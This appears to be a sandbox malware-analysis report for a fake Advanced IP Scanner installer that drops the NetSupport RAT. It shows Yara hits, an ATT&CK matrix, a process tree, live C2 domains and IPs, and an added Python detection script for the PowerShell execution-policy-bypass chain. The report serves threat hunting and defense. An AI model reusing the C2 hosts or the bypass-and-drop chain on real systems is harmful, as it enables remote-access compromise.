Source: Yara match | File source: 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2034197288.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.2033095471.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.2113912617.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2116677838.0000000000788000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5448, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 4008, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 2004, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 7072, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, type: DROPPED
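As an added hunting example (not part of the sandbox report, and not code from NetSupport or Joe Sandbox), the Python below turns two of the observations in this section into checks: the process chain (the Inno Setup stub in Temp launching PowerShell with -ExecutionPolicy Bypass on a .ps1 in Temp, which then starts client32.exe from AppData\Roaming\SystemUtil) and the NetSupport client file set flagged above as DROPPED. The process-creation events and the directory listing are constructed to mirror the report, not copied from it; the rule names, the regexes and the three-DLL threshold are the editor's choices, not anything the page defines.

```python
"""Hunt for the NetSupport deployment chain recorded in this report.

Two checks: (1) the process-creation pattern (Temp stub -> PowerShell with
-ExecutionPolicy Bypass on a .ps1 in Temp -> an EXE launched from AppData)
and (2) the NetSupport client file set dropped into one folder.
"""
import re

# Constructed process-creation events in the field layout Sysmon Event ID 1
# uses (ParentImage, Image, CommandLine). They mirror the report's process
# tree; they are not log records taken from the sandbox.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                        r'-ExecutionPolicy Bypass -File '
                        r'"C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"'),
    },
    {
        "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe",
        "CommandLine": r'"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"',
    },
    {   # ordinary admin use that must stay quiet
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"powershell.exe" -File C:\Scripts\backup.ps1',
    },
]

POWERSHELL = re.compile(r"\\powershell\.exe$", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
TEMP_SCRIPT = re.compile(r"\\AppData\\Local\\Temp\\[\w.\\-]*\.ps1", re.IGNORECASE)
# -ep and -exec are accepted abbreviations of -ExecutionPolicy
POLICY_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep|exec)\s+(?:Bypass|Unrestricted)", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)


def classify(event):
    """Names of the rules (editor-chosen labels) that fire on one event."""
    parent, image, cmd = event["ParentImage"], event["Image"], event["CommandLine"]
    hits = []
    if POWERSHELL.search(image):
        if POLICY_BYPASS.search(cmd) and TEMP_SCRIPT.search(cmd):
            hits.append("powershell_bypass_temp_script")
        if TEMP_DIR.search(parent):
            hits.append("powershell_parent_in_temp")
    if POWERSHELL.search(parent) and USER_WRITABLE.search(image) and image.lower().endswith(".exe"):
        hits.append("powershell_spawns_appdata_exe")
    return hits


def find_chain(events):
    """Return (stage1, stage2) when a policy-bypassing PowerShell is followed by
    an EXE launched from AppData with that PowerShell as parent, else None.
    Correlation here is by image path only; on real Sysmon data join on
    ParentProcessGuid == ProcessGuid instead, since image paths repeat."""
    stage1 = [e for e in events if "powershell_bypass_temp_script" in classify(e)]
    for first in stage1:
        for second in events:
            if ("powershell_spawns_appdata_exe" in classify(second)
                    and second["ParentImage"].lower() == first["Image"].lower()):
                return first, second
    return None


# File names the report lists as dropped into AppData\Roaming\SystemUtil.
NETSUPPORT_COMPONENTS = {
    "client32.exe", "pcicl32.dll", "htctl32.dll", "tcctl32.dll",
    "pcicapi.dll", "pcichek.dll", "audiocapture.dll",
}

# Constructed directory listing shaped like the report's drop folder.
SAMPLE_LISTING = ["client32.exe", "PCICL32.DLL", "HTCTL32.DLL", "TCCTL32.DLL",
                  "pcicapi.dll", "PCICHEK.DLL", "AudioCapture.dll", "client32.ini"]


def netsupport_fileset(listing, min_dlls=3):
    """Return (sorted matching names, verdict). The verdict is True only when
    client32.exe sits beside at least min_dlls companion DLLs: the client name
    alone is too weak, since NetSupport Manager is also a licensed product."""
    present = sorted(n for n in listing if n.lower() in NETSUPPORT_COMPONENTS)
    lowered = {n.lower() for n in present}
    verdict = "client32.exe" in lowered and len(lowered - {"client32.exe"}) >= min_dlls
    return present, verdict


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Image"].rsplit("\\", 1)[-1], classify(ev))
    print("chain found:", find_chain(SAMPLE_EVENTS) is not None)
    print("fileset:", netsupport_fileset(SAMPLE_LISTING))
```

On live telemetry, feed Sysmon Event ID 1 (or 4688 with command-line auditing enabled) into classify() and correlate on ProcessGuid rather than image path. Neither check is a verdict on its own: client32.exe is a legitimately sold remote-control client, which is why the file-set check demands the companion DLLs, and why the install path under AppData\Roaming reached through an execution-policy bypass, rather than a normal installer placing the product under Program Files, is the stronger signal here.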
MITRE ATT&CK Matrix (techniques listed per tactic, in the matrix's row order; a leading number is the count shown beside that technique in the original matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Windows Management Instrumentation; 3 Native API; 2 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; 11 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading; 2 Masquerading; 2 Valid Accounts; 31 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection; Dynamic API Resolution
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 11 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 33 System Information Discovery; 151 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 3 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; 1 Screen Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 3 Ingress Tool Transfer; 22 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1552424; Sample: KC0uZWwr8p.exe; Start date: 08/11/2024; Architecture: WINDOWS; Score: 60)

The graph is rendered below as a process tree reconstructed from the graph's node and edge dump. Figures in square brackets are the per-node counts as extracted (created registry values / created files).

Start
  DNS/IP: payiki.com; anyhowdo.com; geo.netsupportsoftware.com
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Powershell drops NetSupport RAT client; 5 other signatures
  Started: KC0uZWwr8p.exe [2]; client32.exe; client32.exe

KC0uZWwr8p.exe [2]
  Dropped: C:\Users\user\AppData\...\KC0uZWwr8p.tmp (PE32)
  Started: KC0uZWwr8p.tmp [25, 149]

KC0uZWwr8p.tmp [25, 149]
  Dropped: C:\Program Files (x86)\...\is-F5QT3.tmp (PE32); C:\Users\user\...xtractedContent.ps1 (ASCII); C:\Program Files (x86)\...\unins000.dat (InnoSetup); 116 other files (none is malicious)
  Signatures: Bypasses PowerShell execution policy
  Started: powershell.exe [1, 55]

powershell.exe [1, 55]
  Dropped: C:\Users\user\AppData\...\remcmdstub.exe (PE32); C:\Users\user\AppData\Roaming\...\pcicapi.dll (PE32); C:\Users\user\AppData\...\client32.exe (PE32); 7 other files (6 malicious)
  Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module; Powershell drops PE file
  Started: client32.exe [16]; conhost.exe

client32.exe [16]
  Network: anyhowdo.com (199.188.200.195, 443, 49740; NAMECHEAP-NETUS; United States); payiki.com (151.236.16.15, 443, 49739; HVC-ASUS; European Union); geo.netsupportsoftware.com (104.26.0.231, 49741, 49742, 49743; CLOUDFLARENETUS; United States)
  Signatures: Contains functionality to change the wallpaper; Contains functionality to detect sleep reduction / modifications

Source | Detection | Scanner
KC0uZWwr8p.exe | 18% | ReversingLabs

Source | Detection | Scanner
C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy) | 3% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-012CR.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-0LL3Q.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-14FKM.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-2D48T.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-2Q7I9.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-2QS06.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-2QTH6.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-495HA.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-4U5GH.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-56HU1.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-593G3.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-5BNS6.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-5C3J6.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-5JUJC.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-5KHP2.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-5URF2.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-6H7V6.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-92N74.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-9GMK5.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-A7U9L.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-AQQBN.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-BPHN2.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-DLE8L.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-DMJVK.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-DORH9.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-ET1Q4.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-ET38G.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-FLT6F.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-FNUE4.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-FOUIF.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-HA61E.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-I1VEE.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IK3SG.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IVQT8.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-JOPC8.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-L3ANO.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-L4L9S.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-MB1RQ.tmp | 0% | ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
Source | Detection | Scanner | Label
http://www.uninetutility.com/support | 0% | Avira URL Cloud | safe
http://www.uninetutility.com | 0% | Avira URL Cloud | safe
http://151.236.16.15/fakeurl.htm | 0% | Avira URL Cloud | safe
http://www.uninetutility.com/update) | 0% | Avira URL Cloud | safe
http://www.radmin.com | 0% | Avira URL Cloud | safe
http://www.macrovision.com0 | 0% | Avira URL Cloud | safe
http://www.uninetutility.comQV | 0% | Avira URL Cloud | safe
http://199.188.200.195/fakeurl.htm | 0% | Avira URL Cloud | safe
http://www.advanced-ip-scanner.com0 | 0% | Avira URL Cloud | safe
http://www.uninetutility.com/update | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
payiki.com | 151.236.16.15 | true | true | - | unknown
geo.netsupportsoftware.com | 104.26.0.231 | true | false | - | high
anyhowdo.com | 199.188.200.195 | true | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://151.236.16.15/fakeurl.htm | true | Avira URL Cloud: safe | unknown
http://geo.netsupportsoftware.com/location/loca.asp | false | - | high
http://199.188.200.195/fakeurl.htm | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.netsupportsoftware.com | powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | KC0uZWwr8p.exe | false | - | high
http://%s/testpage.htmwininet.dll | powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp | false | - | high
http://geo.netsupportsoftware.com/location/loca.asp%f | client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.uninetutility.com | KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E71000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.uninetutility.com/support | KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E4D000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002ECD000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | false | - | high
http://ocsp.sectigo.com0 | powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.pci.co.uk/supportsupport | client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp | false | - | high
http://www.uninetutility.com/update | KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002EDC000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.openssl.org/V | is-BPHN2.tmp.1.dr | false | - | high
http://qt-project.org/xml/features/report-whitespace-only-CharData | is-0LL3Q.tmp.1.dr | false | - | high
https://contoso.com/License | powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech | is-0LL3Q.tmp.1.dr | false | - | high
http://127.0.0.1RESUMEPRINTING | client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | false | - | high
http://%s/testpage.htm | powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp | false | - | high
http://xml.org/sax/features/namespace-prefixes | is-0LL3Q.tmp.1.dr | false | - | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.uninetutility.com/update) | KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://%s/fakeurl.htm | client32.exe, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp | false | - | high
http://www.openssl.org/support/faq.html | is-BPHN2.tmp.1.dr | false | - | high
http://geo.netsupportsoftware.com/location/loca.aspEg | client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crl.thawte.com/ThawteTimestampingCA.crl0 | KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.uninetutility.comQV | KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002EF1000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.1912534174.00000000045D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.remobjects.com/ps | KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EB2B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000000.1649520541.00000000004C1000.00000020.00000001.01000000.00000004.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.innosetup.com/ | KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EB2B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000000.1649520541.00000000004C1000.00000020.00000001.01000000.00000004.sdmp | false | - | high
